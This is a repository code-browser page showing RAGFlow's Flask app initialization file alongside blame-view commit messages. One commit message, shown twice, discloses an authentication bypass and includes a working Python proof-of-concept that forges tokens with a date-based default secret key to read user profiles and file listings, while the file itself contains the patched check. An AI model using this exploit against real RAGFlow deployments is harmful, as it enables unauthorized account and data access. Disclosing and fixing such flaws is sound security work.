OpenSource
/
ragflow
Vērot 4
Pievienot zvaigznīti 0
Atdalīts 0
Kods Problēmas 0 Izmaiņu pieprasījumi 0 Laidieni 33 Vikivietne Aktivitāte
Nevar pievienot vairāk kā 25 tēmas Tēmai ir jāsākas ar burtu vai ciparu, tā var saturēt domu zīmes ('-') un var būt līdz 35 simboliem gara.
3112 Revīzijas
7 Atzari
Koks: de89b84661
Atzari Tagi
${ item.name }
Izveidot atzaru ${ searchTerm }
no 'de89b84661'
${ noResults }
ragflow/api/apps/__init__.py

__init__.py 5.4KB
Neapstrādāts Parastais skats Vēsture

Format file format from Windows/dos to Unix (#1949) ### What problem does this PR solve? Related source file is in Windows/DOS format, they are format to Unix format. ### Type of change - [x] Refactoring Signed-off-by: Jin Hai <haijin.chn@gmail.com>
pirms 1 gada
Use consistent log file names, introduced initLogger (#3403) ### What problem does this PR solve? Use consistent log file names, introduced initLogger ### Type of change - [ ] Bug Fix (non-breaking change which fixes an issue) - [ ] New Feature (non-breaking change which adds functionality) - [ ] Documentation Update - [x] Refactoring - [ ] Performance Improvement - [ ] Other (please describe):
pirms 11 mēnešiem
Format file format from Windows/dos to Unix (#1949) ### What problem does this PR solve? Related source file is in Windows/DOS format, they are format to Unix format. ### Type of change - [x] Refactoring Signed-off-by: Jin Hai <haijin.chn@gmail.com>
pirms 1 gada
feat: docs for api endpoints to generate openapi specification (#3109) ### What problem does this PR solve? **Added openapi specification for API routes. This creates swagger UI similar to FastAPI to better use the API.** Using python package `flasgger` ### Type of change - [x] New Feature (non-breaking change which adds functionality) Not all routes are included since this is a work in progress. Docs can be accessed on: `{host}:{port}/apidocs`
pirms 1 gada
Remove unused code (#3448) ### What problem does this PR solve? 1. Remove unused code. 2. Move some codes from settings to constants ### Type of change - [x] Refactoring --------- Signed-off-by: jinhai <haijin.chn@gmail.com>
pirms 11 mēnešiem
Format file format from Windows/dos to Unix (#1949) ### What problem does this PR solve? Related source file is in Windows/DOS format, they are format to Unix format. ### Type of change - [x] Refactoring Signed-off-by: Jin Hai <haijin.chn@gmail.com>
pirms 1 gada
Move settings initialization after module init phase (#3438) ### What problem does this PR solve? 1. Module init won't connect database any more. 2. Config in settings need to be used with settings.CONFIG_NAME ### Type of change - [x] Refactoring Signed-off-by: jinhai <haijin.chn@gmail.com>
pirms 11 mēnešiem
Format file format from Windows/dos to Unix (#1949) ### What problem does this PR solve? Related source file is in Windows/DOS format, they are format to Unix format. ### Type of change - [x] Refactoring Signed-off-by: Jin Hai <haijin.chn@gmail.com>
pirms 1 gada
Remove unused code (#3448) ### What problem does this PR solve? 1. Remove unused code. 2. Move some codes from settings to constants ### Type of change - [x] Refactoring --------- Signed-off-by: jinhai <haijin.chn@gmail.com>
pirms 11 mēnešiem
Format file format from Windows/dos to Unix (#1949) ### What problem does this PR solve? Related source file is in Windows/DOS format, they are format to Unix format. ### Type of change - [x] Refactoring Signed-off-by: Jin Hai <haijin.chn@gmail.com>
pirms 1 gada
feat: docs for api endpoints to generate openapi specification (#3109) ### What problem does this PR solve? **Added openapi specification for API routes. This creates swagger UI similar to FastAPI to better use the API.** Using python package `flasgger` ### Type of change - [x] New Feature (non-breaking change which adds functionality) Not all routes are included since this is a work in progress. Docs can be accessed on: `{host}:{port}/apidocs`
pirms 1 gada
Format file format from Windows/dos to Unix (#1949) ### What problem does this PR solve? Related source file is in Windows/DOS format, they are format to Unix format. ### Type of change - [x] Refactoring Signed-off-by: Jin Hai <haijin.chn@gmail.com>
pirms 1 gada
feat: docs for api endpoints to generate openapi specification (#3109) ### What problem does this PR solve? **Added openapi specification for API routes. This creates swagger UI similar to FastAPI to better use the API.** Using python package `flasgger` ### Type of change - [x] New Feature (non-breaking change which adds functionality) Not all routes are included since this is a work in progress. Docs can be accessed on: `{host}:{port}/apidocs`
pirms 1 gada
Format file format from Windows/dos to Unix (#1949) ### What problem does this PR solve? Related source file is in Windows/DOS format, they are format to Unix format. ### Type of change - [x] Refactoring Signed-off-by: Jin Hai <haijin.chn@gmail.com>
pirms 1 gada
feat: docs for api endpoints to generate openapi specification (#3109) ### What problem does this PR solve? **Added openapi specification for API routes. This creates swagger UI similar to FastAPI to better use the API.** Using python package `flasgger` ### Type of change - [x] New Feature (non-breaking change which adds functionality) Not all routes are included since this is a work in progress. Docs can be accessed on: `{host}:{port}/apidocs`
pirms 1 gada
Format file format from Windows/dos to Unix (#1949) ### What problem does this PR solve? Related source file is in Windows/DOS format, they are format to Unix format. ### Type of change - [x] Refactoring Signed-off-by: Jin Hai <haijin.chn@gmail.com>
pirms 1 gada
feat: docs for api endpoints to generate openapi specification (#3109) ### What problem does this PR solve? **Added openapi specification for API routes. This creates swagger UI similar to FastAPI to better use the API.** Using python package `flasgger` ### Type of change - [x] New Feature (non-breaking change which adds functionality) Not all routes are included since this is a work in progress. Docs can be accessed on: `{host}:{port}/apidocs`
pirms 1 gada
Refa: enlarge default max request body size. (#6088) ### What problem does this PR solve? ### Type of change - [x] Refactoring
pirms 7 mēnešiem
feat: docs for api endpoints to generate openapi specification (#3109) ### What problem does this PR solve? **Added openapi specification for API routes. This creates swagger UI similar to FastAPI to better use the API.** Using python package `flasgger` ### Type of change - [x] New Feature (non-breaking change which adds functionality) Not all routes are included since this is a work in progress. Docs can be accessed on: `{host}:{port}/apidocs`
pirms 1 gada
Format file format from Windows/dos to Unix (#1949) ### What problem does this PR solve? Related source file is in Windows/DOS format, they are format to Unix format. ### Type of change - [x] Refactoring Signed-off-by: Jin Hai <haijin.chn@gmail.com>
pirms 1 gada
feat: docs for api endpoints to generate openapi specification (#3109) ### What problem does this PR solve? **Added openapi specification for API routes. This creates swagger UI similar to FastAPI to better use the API.** Using python package `flasgger` ### Type of change - [x] New Feature (non-breaking change which adds functionality) Not all routes are included since this is a work in progress. Docs can be accessed on: `{host}:{port}/apidocs`
pirms 1 gada
Format file format from Windows/dos to Unix (#1949) ### What problem does this PR solve? Related source file is in Windows/DOS format, they are format to Unix format. ### Type of change - [x] Refactoring Signed-off-by: Jin Hai <haijin.chn@gmail.com>
pirms 1 gada
feat: docs for api endpoints to generate openapi specification (#3109) ### What problem does this PR solve? **Added openapi specification for API routes. This creates swagger UI similar to FastAPI to better use the API.** Using python package `flasgger` ### Type of change - [x] New Feature (non-breaking change which adds functionality) Not all routes are included since this is a work in progress. Docs can be accessed on: `{host}:{port}/apidocs`
pirms 1 gada
Format file format from Windows/dos to Unix (#1949) ### What problem does this PR solve? Related source file is in Windows/DOS format, they are format to Unix format. ### Type of change - [x] Refactoring Signed-off-by: Jin Hai <haijin.chn@gmail.com>
pirms 1 gada
Fix:When you create a new API module named xxxa_api, the access route will become xxx instead of xxxa. For example, when I create a new API module named 'data_api', the access route will become 'dat' instead of 'data (#7325) ### What problem does this PR solve? Fix:When you create a new API module named xxxa_api, the access route will become xxx instead of xxxa. For example, when I create a new API module named 'data_api', the access route will become 'dat' instead of 'data' Fix:Fixed the issue where the new knowledge base would not be renamed when there was a knowledge base with the same name ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue) --------- Co-authored-by: tangyu <1@1.com> Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
pirms 5 mēnešiem
feat: docs for api endpoints to generate openapi specification (#3109) ### What problem does this PR solve? **Added openapi specification for API routes. This creates swagger UI similar to FastAPI to better use the API.** Using python package `flasgger` ### Type of change - [x] New Feature (non-breaking change which adds functionality) Not all routes are included since this is a work in progress. Docs can be accessed on: `{host}:{port}/apidocs`
pirms 1 gada
Move settings initialization after module init phase (#3438) ### What problem does this PR solve? 1. Module init won't connect database any more. 2. Config in settings need to be used with settings.CONFIG_NAME ### Type of change - [x] Refactoring Signed-off-by: jinhai <haijin.chn@gmail.com>
pirms 11 mēnešiem
feat: docs for api endpoints to generate openapi specification (#3109) ### What problem does this PR solve? **Added openapi specification for API routes. This creates swagger UI similar to FastAPI to better use the API.** Using python package `flasgger` ### Type of change - [x] New Feature (non-breaking change which adds functionality) Not all routes are included since this is a work in progress. Docs can be accessed on: `{host}:{port}/apidocs`
pirms 1 gada
Format file format from Windows/dos to Unix (#1949) ### What problem does this PR solve? Related source file is in Windows/DOS format, they are format to Unix format. ### Type of change - [x] Refactoring Signed-off-by: Jin Hai <haijin.chn@gmail.com>
pirms 1 gada
feat: docs for api endpoints to generate openapi specification (#3109) ### What problem does this PR solve? **Added openapi specification for API routes. This creates swagger UI similar to FastAPI to better use the API.** Using python package `flasgger` ### Type of change - [x] New Feature (non-breaking change which adds functionality) Not all routes are included since this is a work in progress. Docs can be accessed on: `{host}:{port}/apidocs`
pirms 1 gada
Fix: Starting the source code on Windows, the 'HTTP API' returns 404 (#5042) Fix: When starting the backend service from source code on Windows, the "HTTP API" no longer returns 404.
pirms 8 mēnešiem
feat: docs for api endpoints to generate openapi specification (#3109) ### What problem does this PR solve? **Added openapi specification for API routes. This creates swagger UI similar to FastAPI to better use the API.** Using python package `flasgger` ### Type of change - [x] New Feature (non-breaking change which adds functionality) Not all routes are included since this is a work in progress. Docs can be accessed on: `{host}:{port}/apidocs`
pirms 1 gada
Fix: Starting the source code on Windows, the 'HTTP API' returns 404 (#5042) Fix: When starting the backend service from source code on Windows, the "HTTP API" no longer returns 404.
pirms 8 mēnešiem
feat: docs for api endpoints to generate openapi specification (#3109) ### What problem does this PR solve? **Added openapi specification for API routes. This creates swagger UI similar to FastAPI to better use the API.** Using python package `flasgger` ### Type of change - [x] New Feature (non-breaking change which adds functionality) Not all routes are included since this is a work in progress. Docs can be accessed on: `{host}:{port}/apidocs`
pirms 1 gada
Format file format from Windows/dos to Unix (#1949) ### What problem does this PR solve? Related source file is in Windows/DOS format, they are format to Unix format. ### Type of change - [x] Refactoring Signed-off-by: Jin Hai <haijin.chn@gmail.com>
pirms 1 gada
feat: docs for api endpoints to generate openapi specification (#3109) ### What problem does this PR solve? **Added openapi specification for API routes. This creates swagger UI similar to FastAPI to better use the API.** Using python package `flasgger` ### Type of change - [x] New Feature (non-breaking change which adds functionality) Not all routes are included since this is a work in progress. Docs can be accessed on: `{host}:{port}/apidocs`
pirms 1 gada
Format file format from Windows/dos to Unix (#1949) ### What problem does this PR solve? Related source file is in Windows/DOS format, they are format to Unix format. ### Type of change - [x] Refactoring Signed-off-by: Jin Hai <haijin.chn@gmail.com>
pirms 1 gada
feat: docs for api endpoints to generate openapi specification (#3109) ### What problem does this PR solve? **Added openapi specification for API routes. This creates swagger UI similar to FastAPI to better use the API.** Using python package `flasgger` ### Type of change - [x] New Feature (non-breaking change which adds functionality) Not all routes are included since this is a work in progress. Docs can be accessed on: `{host}:{port}/apidocs`
pirms 1 gada
Format file format from Windows/dos to Unix (#1949) ### What problem does this PR solve? Related source file is in Windows/DOS format, they are format to Unix format. ### Type of change - [x] Refactoring Signed-off-by: Jin Hai <haijin.chn@gmail.com>
pirms 1 gada
Move settings initialization after module init phase (#3438) ### What problem does this PR solve? 1. Module init won't connect database any more. 2. Config in settings need to be used with settings.CONFIG_NAME ### Type of change - [x] Refactoring Signed-off-by: jinhai <haijin.chn@gmail.com>
pirms 11 mēnešiem
Format file format from Windows/dos to Unix (#1949) ### What problem does this PR solve? Related source file is in Windows/DOS format, they are format to Unix format. ### Type of change - [x] Refactoring Signed-off-by: Jin Hai <haijin.chn@gmail.com>
pirms 1 gada
Fix: Authentication Bypass via predictable JWT secret and empty token validation (#7998) ### Description There's a critical authentication bypass vulnerability that allows remote attackers to gain unauthorized access to user accounts without any credentials. The vulnerability stems from two security flaws: (1) the application uses a predictable `SECRET_KEY` that defaults to the current date, and (2) the authentication mechanism fails to properly validate empty access tokens left by logged-out users. When combined, these flaws allow attackers to forge valid JWT tokens and authenticate as any user who has previously logged out of the system. The authentication flow relies on JWT tokens signed with a `SECRET_KEY` that, in default configurations, is set to `str(date.today())` (e.g., "2025-05-30"). When users log out, their `access_token` field in the database is set to an empty string but their account records remain active. An attacker can exploit this by generating a JWT token that represents an empty access_token using the predictable daily secret, effectively bypassing all authentication controls. ### Source - Sink Analysis **Source (User Input):** HTTP Authorization header containing attacker-controlled JWT token **Flow Path:** 1. **Entry Point:** `load_user()` function in `api/apps/__init__.py` (Line 142) 2. **Token Processing:** JWT token extracted from Authorization header 3. **Secret Key Usage:** Token decoded using predictable SECRET_KEY from `api/settings.py` (Line 123) 4. **Database Query:** `UserService.query()` called with decoded empty access_token 5. **Sink:** Authentication succeeds, returning first user with empty access_token ### Proof of Concept ```python import requests from datetime import date from itsdangerous.url_safe import URLSafeTimedSerializer import sys def exploit_ragflow(target): # Generate token with predictable key daily_key = str(date.today()) serializer = URLSafeTimedSerializer(secret_key=daily_key) malicious_token = serializer.dumps("") print(f"Target: {target}") print(f"Secret key: {daily_key}") print(f"Generated token: {malicious_token}\n") # Test endpoints endpoints = [ ("/v1/user/info", "User profile"), ("/v1/file/list?parent_id=&keywords=&page_size=10&page=1", "File listing") ] auth_headers = {"Authorization": malicious_token} for path, description in endpoints: print(f"Testing {description}...") response = requests.get(f"{target}{path}", headers=auth_headers) if response.status_code == 200: data = response.json() if data.get("code") == 0: print(f"SUCCESS {description} accessible") if "user" in path: user_data = data.get("data", {}) print(f" Email: {user_data.get('email')}") print(f" User ID: {user_data.get('id')}") elif "file" in path: files = data.get("data", {}).get("files", []) print(f" Files found: {len(files)}") else: print(f"Access denied") else: print(f"HTTP {response.status_code}") print() if __name__ == "__main__": target_url = sys.argv[1] if len(sys.argv) > 1 else "http://localhost" exploit_ragflow(target_url) ``` **Exploitation Steps:** 1. Deploy RAGFlow with default configuration 2. Create a user and make at least one user log out (creating empty access_token in database) 3. Run the PoC script against the target 4. Observe successful authentication and data access without any credentials **Version:** 0.19.0 @KevinHuSh @asiroliu @cike8899 Co-authored-by: nkoorty <amalyshau2002@gmail.com>
pirms 5 mēnešiem
feat: docs for api endpoints to generate openapi specification (#3109) ### What problem does this PR solve? **Added openapi specification for API routes. This creates swagger UI similar to FastAPI to better use the API.** Using python package `flasgger` ### Type of change - [x] New Feature (non-breaking change which adds functionality) Not all routes are included since this is a work in progress. Docs can be accessed on: `{host}:{port}/apidocs`
pirms 1 gada
Format file format from Windows/dos to Unix (#1949) ### What problem does this PR solve? Related source file is in Windows/DOS format, they are format to Unix format. ### Type of change - [x] Refactoring Signed-off-by: Jin Hai <haijin.chn@gmail.com>
pirms 1 gada
Fix: Authentication Bypass via predictable JWT secret and empty token validation (#7998) ### Description There's a critical authentication bypass vulnerability that allows remote attackers to gain unauthorized access to user accounts without any credentials. The vulnerability stems from two security flaws: (1) the application uses a predictable `SECRET_KEY` that defaults to the current date, and (2) the authentication mechanism fails to properly validate empty access tokens left by logged-out users. When combined, these flaws allow attackers to forge valid JWT tokens and authenticate as any user who has previously logged out of the system. The authentication flow relies on JWT tokens signed with a `SECRET_KEY` that, in default configurations, is set to `str(date.today())` (e.g., "2025-05-30"). When users log out, their `access_token` field in the database is set to an empty string but their account records remain active. An attacker can exploit this by generating a JWT token that represents an empty access_token using the predictable daily secret, effectively bypassing all authentication controls. ### Source - Sink Analysis **Source (User Input):** HTTP Authorization header containing attacker-controlled JWT token **Flow Path:** 1. **Entry Point:** `load_user()` function in `api/apps/__init__.py` (Line 142) 2. **Token Processing:** JWT token extracted from Authorization header 3. **Secret Key Usage:** Token decoded using predictable SECRET_KEY from `api/settings.py` (Line 123) 4. **Database Query:** `UserService.query()` called with decoded empty access_token 5. **Sink:** Authentication succeeds, returning first user with empty access_token ### Proof of Concept ```python import requests from datetime import date from itsdangerous.url_safe import URLSafeTimedSerializer import sys def exploit_ragflow(target): # Generate token with predictable key daily_key = str(date.today()) serializer = URLSafeTimedSerializer(secret_key=daily_key) malicious_token = serializer.dumps("") print(f"Target: {target}") print(f"Secret key: {daily_key}") print(f"Generated token: {malicious_token}\n") # Test endpoints endpoints = [ ("/v1/user/info", "User profile"), ("/v1/file/list?parent_id=&keywords=&page_size=10&page=1", "File listing") ] auth_headers = {"Authorization": malicious_token} for path, description in endpoints: print(f"Testing {description}...") response = requests.get(f"{target}{path}", headers=auth_headers) if response.status_code == 200: data = response.json() if data.get("code") == 0: print(f"SUCCESS {description} accessible") if "user" in path: user_data = data.get("data", {}) print(f" Email: {user_data.get('email')}") print(f" User ID: {user_data.get('id')}") elif "file" in path: files = data.get("data", {}).get("files", []) print(f" Files found: {len(files)}") else: print(f"Access denied") else: print(f"HTTP {response.status_code}") print() if __name__ == "__main__": target_url = sys.argv[1] if len(sys.argv) > 1 else "http://localhost" exploit_ragflow(target_url) ``` **Exploitation Steps:** 1. Deploy RAGFlow with default configuration 2. Create a user and make at least one user log out (creating empty access_token in database) 3. Run the PoC script against the target 4. Observe successful authentication and data access without any credentials **Version:** 0.19.0 @KevinHuSh @asiroliu @cike8899 Co-authored-by: nkoorty <amalyshau2002@gmail.com>
pirms 5 mēnešiem
Format file format from Windows/dos to Unix (#1949) ### What problem does this PR solve? Related source file is in Windows/DOS format, they are format to Unix format. ### Type of change - [x] Refactoring Signed-off-by: Jin Hai <haijin.chn@gmail.com>
pirms 1 gada
Refactor (#4303) ### What problem does this PR solve? ### Type of change - [x] Refactoring
pirms 10 mēnešiem
Format file format from Windows/dos to Unix (#1949) ### What problem does this PR solve? Related source file is in Windows/DOS format, they are format to Unix format. ### Type of change - [x] Refactoring Signed-off-by: Jin Hai <haijin.chn@gmail.com>
pirms 1 gada
feat: docs for api endpoints to generate openapi specification (#3109) ### What problem does this PR solve? **Added openapi specification for API routes. This creates swagger UI similar to FastAPI to better use the API.** Using python package `flasgger` ### Type of change - [x] New Feature (non-breaking change which adds functionality) Not all routes are included since this is a work in progress. Docs can be accessed on: `{host}:{port}/apidocs`
pirms 1 gada
 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178 
  1. #

  2. #  Copyright 2024 The InfiniFlow Authors. All Rights Reserved.

  3. #

  4. #  Licensed under the Apache License, Version 2.0 (the "License");

  5. #  you may not use this file except in compliance with the License.

  6. #  You may obtain a copy of the License at

  7. #

  8. #      http://www.apache.org/licenses/LICENSE-2.0

  9. #

  10. #  Unless required by applicable law or agreed to in writing, software

  11. #  distributed under the License is distributed on an "AS IS" BASIS,

  12. #  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.

  13. #  See the License for the specific language governing permissions and

  14. #  limitations under the License.

  15. #

  16. import os

  17. import sys

  18. import logging

  19. from importlib.util import module_from_spec, spec_from_file_location

  20. from pathlib import Path

  21. from flask import Blueprint, Flask

  22. from werkzeug.wrappers.request import Request

  23. from flask_cors import CORS

  24. from flasgger import Swagger

  25. from itsdangerous.url_safe import URLSafeTimedSerializer as Serializer

  26. 

  27. from api.db import StatusEnum

  28. from api.db.db_models import close_connection

  29. from api.db.services import UserService

  30. from api.utils import CustomJSONEncoder, commands

  31. 

  32. from flask_session import Session

  33. from flask_login import LoginManager

  34. from api import settings

  35. from api.utils.api_utils import server_error_response

  36. from api.constants import API_VERSION

  37. 

  38. __all__ = ["app"]

  39. 

  40. Request.json = property(lambda self: self.get_json(force=True, silent=True))

  41. 

  42. app = Flask(__name__)

  43. 

  44. # Add this at the beginning of your file to configure Swagger UI

  45. swagger_config = {

  46.     "headers": [],

  47.     "specs": [

  48.         {

  49.             "endpoint": "apispec",

  50.             "route": "/apispec.json",

  51.             "rule_filter": lambda rule: True,  # Include all endpoints

  52.             "model_filter": lambda tag: True,  # Include all models

  53.         }

  54.     ],

  55.     "static_url_path": "/flasgger_static",

  56.     "swagger_ui": True,

  57.     "specs_route": "/apidocs/",

  58. }

  59. 

  60. swagger = Swagger(

  61.     app,

  62.     config=swagger_config,

  63.     template={

  64.         "swagger": "2.0",

  65.         "info": {

  66.             "title": "RAGFlow API",

  67.             "description": "",

  68.             "version": "1.0.0",

  69.         },

  70.         "securityDefinitions": {

  71.             "ApiKeyAuth": {"type": "apiKey", "name": "Authorization", "in": "header"}

  72.         },

  73.     },

  74. )

  75. 

  76. CORS(app, supports_credentials=True, max_age=2592000)

  77. app.url_map.strict_slashes = False

  78. app.json_encoder = CustomJSONEncoder

  79. app.errorhandler(Exception)(server_error_response)

  80. 

  81. ## convince for dev and debug

  82. # app.config["LOGIN_DISABLED"] = True

  83. app.config["SESSION_PERMANENT"] = False

  84. app.config["SESSION_TYPE"] = "filesystem"

  85. app.config["MAX_CONTENT_LENGTH"] = int(

  86.     os.environ.get("MAX_CONTENT_LENGTH", 1024 * 1024 * 1024)

  87. )

  88. 

  89. Session(app)

  90. login_manager = LoginManager()

  91. login_manager.init_app(app)

  92. 

  93. commands.register_commands(app)

  94. 

  95. 

  96. def search_pages_path(pages_dir):

  97.     app_path_list = [

  98.         path for path in pages_dir.glob("*_app.py") if not path.name.startswith(".")

  99.     ]

  100.     api_path_list = [

  101.         path for path in pages_dir.glob("*sdk/*.py") if not path.name.startswith(".")

  102.     ]

  103.     app_path_list.extend(api_path_list)

  104.     return app_path_list

  105. 

  106. 

  107. def register_page(page_path):

  108.     path = f"{page_path}"

  109. 

  110.     page_name = page_path.stem.removesuffix("_app")

  111.     module_name = ".".join(

  112.         page_path.parts[page_path.parts.index("api"): -1] + (page_name,)

  113.     )

  114. 

  115.     spec = spec_from_file_location(module_name, page_path)

  116.     page = module_from_spec(spec)

  117.     page.app = app

  118.     page.manager = Blueprint(page_name, module_name)

  119.     sys.modules[module_name] = page

  120.     spec.loader.exec_module(page)

  121.     page_name = getattr(page, "page_name", page_name)

  122.     sdk_path = "\\sdk\\" if sys.platform.startswith("win") else "/sdk/"

  123.     url_prefix = (

  124.         f"/api/{API_VERSION}" if sdk_path in path else f"/{API_VERSION}/{page_name}"

  125.     )

  126. 

  127.     app.register_blueprint(page.manager, url_prefix=url_prefix)

  128.     return url_prefix

  129. 

  130. 

  131. pages_dir = [

  132.     Path(__file__).parent,

  133.     Path(__file__).parent.parent / "api" / "apps",

  134.     Path(__file__).parent.parent / "api" / "apps" / "sdk",

  135. ]

  136. 

  137. client_urls_prefix = [

  138.     register_page(path) for dir in pages_dir for path in search_pages_path(dir)

  139. ]

  140. 

  141. 

  142. @login_manager.request_loader

  143. def load_user(web_request):

  144.     jwt = Serializer(secret_key=settings.SECRET_KEY)

  145.     authorization = web_request.headers.get("Authorization")

  146.     if authorization:

  147.         try:

  148.             access_token = str(jwt.loads(authorization))

  149.             

  150.             if not access_token or not access_token.strip():

  151.                 logging.warning("Authentication attempt with empty access token")

  152.                 return None

  153.             

  154.             # Access tokens should be UUIDs (32 hex characters)

  155.             if len(access_token.strip()) < 32:

  156.                 logging.warning(f"Authentication attempt with invalid token format: {len(access_token)} chars")

  157.                 return None

  158.             

  159.             user = UserService.query(

  160.                 access_token=access_token, status=StatusEnum.VALID.value

  161.             )

  162.             if user:

  163.                 if not user[0].access_token or not user[0].access_token.strip():

  164.                     logging.warning(f"User {user[0].email} has empty access_token in database")

  165.                     return None

  166.                 return user[0]

  167.             else:

  168.                 return None

  169.         except Exception as e:

  170.             logging.warning(f"load_user got exception {e}")

  171.             return None

  172.     else:

  173.         return None

  174. 

  175. 

  176. @app.teardown_request

  177. def _db_close(exc):

  178.     close_connection()